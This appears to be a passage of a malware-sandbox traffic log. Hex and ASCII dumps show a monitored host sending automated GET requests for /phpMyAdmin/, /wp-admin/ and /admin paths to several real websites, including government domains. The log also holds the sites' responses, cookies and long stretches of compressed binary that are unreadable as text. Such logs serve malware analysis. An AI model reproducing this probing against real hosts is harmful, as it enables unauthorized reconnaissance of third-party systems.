2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.688529015 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                434192.168.2.66336345.60.0.4480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.431020975 CET176OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.662090063 CET958INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=5tag4wo4T1GfIO+elp7EN3fDwGUAAAAAQUIPAAAAAAB4BLkAhZmiG4QXdfRN9Zxs; expires=Tue, 04 Feb 2025 10:21:14 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=xtV/OHOIMD7ou0OAaJQkpgAAAAAeL0CQftwLs0ZTw13GYZzv; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=WqiPd+MpAh7vehA+arozGXfDwGUAAAAAf0zscGSg46veBuMVqud6tA==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 44-17307560-17307561 NNNY CT(118 -1 0) RT(1707131767223 1) q(0 0 0 0) r(1 1) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/phpMyAdmin/">here</a></body>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                435192.168.2.663048164.100.128.1580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.444693089 CET176OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.817985058 CET139INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://upsconline.nic.in/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                436192.168.2.662960164.100.213.21080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.459352016 CET171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.920877934 CET139INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.121624947 CET139INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.322884083 CET139INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                437192.168.2.663474192.185.5.2380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.494709015 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699369907 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=be23f1af5ca825b96bd4b26c0ea58c06; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 39 35 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 73 23 c9 95 25 f8 b9 d2 6c ff 83 57 c8 5a 95 39 4a 0f 84 3f c3 a3 8a a0 4c 55 ad de ee b1 66 8f 4c 8f 69 5b 53 c9 c6 40 20 92 88 aa 20 40 00 41 30 49 a9 fe fb 9e 73 3d 00 46 b2 52 a5 ec 69 cd ec ae d9 a6 31 1d 37 dc ef e3 dc 73 ce c5 e7 ff f8 df be f9 fd ff f5 9b 5f ab f5 70 db 5f be ba e0 8f ea 17 9b 9b 79 d1 6e f4 1f 7e 57 a8 65 bf 38 1c e6 c5 66 ab bf 3b 28 9c 87 e3 4d c1 c4 76 b1 c2 cf 6d 3b 2c d4 72 bd d8 1f da 61 5e fc e1 f7 ff a4 53 71 ba de 2c 6e db 79 71 ec da 87 bb ed 7e 40 a7 ed 66 68 37 48 7b e8 56 c3 7a be 6a 8f dd b2 d5 f2 f1 56 75 9b 6e e8 16 bd 3e 2c 17 7d 3b 37 6c d2 77 9b ef d5 be ed e7 c5 dd 7e fb ae eb db 42 ad f7 ed bb 79 31 9b dd dc de dd 94 db fd cd ec fd bb cd cc 30 fb d5 c5 61 b9 ef ee 86 cb d7 ef ee 37 cb a1 db 6e 5e 73 97 37 7f e6 59 ca 12 ff 06 3c 6a ae 3e bc 28 f7 ed 5d bf 58 b6 af 67 df 5e cb 8e df 5e cf de 7e f1 dd e1 8b 37 3f bc 79 bd da 2e ef 6f 01 b9 3c 05 bf ee 5b fe bc f9 ea 62 36 8e 7b 75 31 74 43 df 5e 5e dd f7 43 a7 fe 65 d5 2e 0e ea e7 3f 4b d6 98 af d4 7f bd 3f 0c 6a b1 d9 0e eb 76 af fe 7d bb 5f fd 66 df 1e 0e ea d0 0d ed c5 2c 97 4d b6 fc 62 b5 39 e8 3b 2c d8 0e cb f5 17 79 d5 2f 66 b3 77 60 ed 50 de 6c b7 37 7d bb b8 eb 0e e5 72 7b fb 85 9a 7d 42 e5 a1 7c 20 47 93 e4 17 3d 0f c3 62 e8 96 b9 e1 72 bf 3d 1c b6 fb ee a6 db e4 9e e8 07 c1 36 ed 72 78 31 ad 58 f4 43 bb df 2c 06 e8 31 3c de 41 e2 c5 dd 5d df 2d 17 24 7d b6 3f 1c 7e f1 fe b6 c7 13 f7 9b 17 1f f0 b2 5f ec ee b7 5f a9 7f 6a db d5 b3 96 b7 cc e8 98 40 24 b3 6e b3 6a df 97 77 eb bb d9 3b a4 cd 8a bf f7 f0 6f b6 b7 94 f0 f0 a9 28 96 63 fe 14 ce e7 5a ab df af bb 2c a5 ba 3f b4 07 05 8d d5 ff 29 22 a9 5f 6d 16 fd 23 88 3d a8 eb 47 75 b5 dd 1c 80 f8 5f 36 87 ee 66 8d a9 77 fd 3d 29 3e d6 65 5d 1a a5 d5 1f 0e dd e6 66 52 32 ec 17 cb ef 79 a5 d5 6c f6 f0 f0 50 de e6 06 dd d8 40 d0 29 ad 2f ff 8f 0c e3 df b6 43 fb e5 8f a6 00 1a 6c a7 96 f7 fb 3d b0 f7 8f 0a 52 be eb 6e ee f7 ed 4a 6d 37 00 3b 62 2f b1 46 9b b7 d8 3e 6c e0 d2 0d 96 04 88 ad 5a dc 63 a3 cd 40 66 5b f5 d0 0d eb 1f 6f d7 6d 64 eb 97 b3 0f ed 30 60 01 ac ba d8 b4 7d 49 ac 27 a8 ea 0f bf 02 92 55 cb 9c c9 0e b3 4f 62 4e f2 3f fb ec e2 b0 dc 77 77 c3 a8 fe d0 be 1f 66 df 2d 8e 8b 7c 5b 5c 22 e3 b3 07 a8 b7 7d 28 ff c7 c3 5d 7b bb fd ae fb dd 09 d0 5c fd b9 b8 5e 1c da 3f ec fb e2 cb 62 3d 0c 77 87 2f bf 9d 7d 3b 3b 94 0f e5 76 7f f3 ed ac bb 5d dc b4 87 6f a1 f9 be fd 76 26 c5 df ce 8c 29 6d 59 7d 3b ab ed fb da 7e 3b 2b de 16 98 89 fa f2 6e 73 83 8f c3 f1 e6 7f ae 1f 0a a5 1b 7e 7f 9d 1b 22 e2 f7 f6 7e bf 6c 8b 2f ff 5c 40 34 d2 cf b2 b1 bf b4 ff d0 aa df ce 1e ee 74 b7 59 f6 f7 2b 8e fa ee 20 17 52 a4 f7 6d 8f ac b6 bc ed 36 e5 77 87 5f 1e db fd 3c 94 a6 34 c5 0f 3f 7c 45 a2 3e 7f 77 bf 59 0e dd 76 f3 7a f1 f6 fa ed f2 cd 9f 4f df 6a c5 9b 37 7f 3e 2e f6 6a 39 ff dd 00 fb dd 94 ef f6 db db 6f d6 8b fd 37 50 f0 ab be 5c a2 f7 fe b7 ed 72 78 5d bd ad de 7e 5f 3e 74 ab
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 957ks#%lWZ9J?LUfLi[S@ @A0Is=FRi17s_p_yn~We8f;(Mvm;,ra^Sq,nyq~@fh7H{VzjVun>,};7lw~By10a7n^s7Y<j>(]Xg^^~7?y.o<[b6{u1tC^^Ce.?K?jv}_f,Mb9;,y/fw`Pl7}r{}B| G=br=6rx1XC,1<A]-$}?~__j@$njw;o(cZ,?)"_m#=Gu_6fw=)>e]fR2ylP@)/Cl=RnJm7;b/F>lZc@f[omd0`}I'UObN?wwf-|[\"}(]{\^?b=w/};;v]ov&)mY};~;+ns~"~l/\@4tY+ Rm6w_<4?|E>wYvzOj7>.j9o7P\rx]~_>t
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699409008 CET1286INData Raw: 61 8d df 75 4b bd de bc ed cb 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 15 db d7 8b bc e0 f5 57 dd bb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: auKw]d^5}v{5~z=o=vWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh>tu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699445009 CET1286INData Raw: db dd b7 fb c7 f1 e7 34 16 12 db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86 3f fc f6 5f 8a bc 48 b1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 40=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCpt1ffaA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699481964 CET1286INData Raw: d8 bc 3c 4f ca 4c ff 35 05 70 9d d7 3a 93 92 37 ff b1 3e d2 70 5c 5a 7e 3f ca 37 dc 94 2f 0f cb 7d 77 37 a8 e1 f1 ae 9d 7f 31 b4 ef 87 d9 77 8b e3 22 df 7e 71 f9 6a f6 5f d4 c5 e7 7f fc e6 1f 7f f5 fb 5f fd 51 fd 97 d9 ab e3 62 af 86 07 b4 7e 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <OL5p:7>p\Z~?7/}w71w"~qj__Qb~<Gw=j\8oF-:Q<<}w-b-[}jno-."|[#-/z3@ogtYw.,/Prlv{]jr==^P4p}w
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699521065 CET1286INData Raw: 0e a6 9e a7 63 07 99 b8 e3 10 80 ad a6 30 86 4f c7 b1 33 f4 26 48 39 f7 c4 fb 79 98 e0 49 f4 a4 32 b1 f4 b6 39 52 d8 86 62 b2 69 10 39 6b 83 b6 b6 0a 9c da 00 2a 2c 15 ec 5a 9b a6 4c a1 26 3e e0 17 7c 55 45 a7 61 1c 6d 17 6c 8d 09 36 1c 0d 1e 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: c0O3&H9yI29Rbi9k*,ZL&>|UEaml6LuL4,zKL(pd9f%4q^b1<9uru*c>Dsv&g'|E!UNgeZSy>:q*Alaaa;;h|C.XXF.J
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699558020 CET1286INData Raw: 20 bf 93 e5 f1 83 4f da 2c 51 71 60 18 cd 6e 65 19 43 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: O,Qq`neCIU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-k
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699594021 CET1286INData Raw: 8a 22 32 81 05 d8 7c d0 f2 93 95 db e1 a5 a1 41 f3 65 ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "2|Aeu,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSY
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699630976 CET1286INData Raw: cc 9d a3 ef 50 14 cb 94 44 5e d7 10 59 63 54 3e e5 26 bf ee 08 d0 27 0b de a2 89 2a 95 55 04 6f 11 9e a4 dd 9a 10 68 31 bc 63 81 2a 89 8b 8d a7 e8 36 90 5d 70 99 39 06 19 15 1d c2 b4 aa a1 73 62 1c 72 6c 4b 5f 59 31 78 2d d9 d0 62 f4 91 29 2b 93
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: PD^YcT>&'*Uoh1c*6]p9sbrlK_Y1x-b)+g`F3S!Sz#5+Ss7ZU!x{-o<NQ!mhrx-p!( E]K3RLIVkd3@Ykgc<.</:%AFH)8q1)F"r@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699668884 CET614INData Raw: 21 e3 a8 00 66 89 0e b2 d1 ae 52 02 20 33 af 5c 19 7c 20 af 4d 08 c0 27 3a 37 b0 1d bf b5 3c 2a 49 5c 93 7a ef 48 7a 36 0d a8 12 8b 39 d7 0c f9 27 5f 1d a9 62 02 63 a7 cc e7 a7 61 52 b3 ce ed 0c dd c6 45 68 76 ba 0d dd e4 d4 72 73 cc 94 4b 33 ac
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: !fR 3\| M':7<*I\zHz69'_bcaREhvrsK3/$YbeP <#%0XlL`?'vz/mxSZL*UV8I1Qz"ct6!seZZF&a9n8v05hc[&*9i\}Sd
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699706078 CET1286INData Raw: 36 31 66 0d 0a 21 1f d2 7b c9 06 66 c8 c3 ce 70 80 68 6f 83 d0 02 21 49 9e a3 57 b0 2a d7 b0 24 2a 7a ba ab ce 14 49 9c 46 01 32 2d 34 12 b1 07 bf 76 34 19 3f b0 81 d0 e1 cd 08 45 db b2 aa 4d b6 b4 ce b3 0c a9 38 c7 22 81 16 3b 9d b1 84 2c 84 44
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 61f!{fpho!IW*$*zIF2-4v4?EM8";,DRtD^@{~9]smB83:S$Dr, /MUd2,~p>E!SjbAm<w#!hzVO*[ghm(R+BT,
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.801453114 CET1286INData Raw: 80 c1 f0 a2 b3 bd 29 bd 6d 94 2f ad b3 3b 18 d6 1b da 2e 8a b4 4d b2 84 c4 0d 5d 69 c4 c3 58 7d 87 17 d6 c3 9c 2e e2 c1 57 96 75 d1 93 87 e0 59 e8 2c 09 8a 4d 64 6a e3 f0 dc 34 86 f2 7a c6 b6 09 8c ab fa a8 9b b2 36 7e ad dd 11 7d 92 6b 76 86 1e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: )m/;.M]iX}.WuY,Mdj4z6~}kv@hl\DuLB*5*&'t>h/Z#6*QU8K w.Os]~/"eh@k[6-g?jO:U{~PZh


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                438192.168.2.66317745.60.74.502222
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.544609070 CET896INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 695
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 7-2915941-0 0NNN RT(1707131767345 8) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 37 2d 32 39 31 35 39 34 31 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 37 31 33 31 37 36 37 33 34 35 25 32 30 38 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 36 33 37 30 34 31 38 37 37 30 30 35 38 30 35 35 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 37 35 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 36 33 37 30 34 31 38 37 37 30 30 35 38 30 35 35 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=7-2915941-0%200NNN%20RT%281707131767345%208%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-16370418770058055&edet=3&cinfo=ffffffff&pe=575&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-16370418770058055</iframe></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                439192.168.2.66349896.7.224.17880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.549360991 CET170OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.662498951 CET628INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
